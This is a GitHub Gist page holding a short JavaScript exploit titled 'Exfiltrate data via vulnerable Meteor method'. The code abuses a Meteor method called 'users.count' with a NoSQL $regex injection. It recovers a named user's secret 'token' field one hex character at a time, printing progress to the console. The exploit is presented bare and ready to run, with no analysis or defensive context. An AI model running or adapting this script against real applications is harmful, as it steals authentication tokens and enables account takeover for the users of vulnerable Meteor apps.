Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Exfiltrate data via vulnerable Meteor method
(function exploit(user, field, alphabet, data = '', index = 0) {
Meteor.call('users.count', {username: user, [field] : {$regex: '^' + data + alphabet[index] + '.*'}}, (err, res) => {
console.log('^' + data + alphabet[index] + '.*', res);
if (res == 0) {
index++;
} else {
data += alphabet[index];
index = 0;
}
if (index >= alphabet.length) {
console.log("Done", data);
return;
}
setTimeout(() => {
exploit(user, field, alphabet, data, index);
});
});
})('kertojasoo', 'token', '0123456789abcdef'.split(''));
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.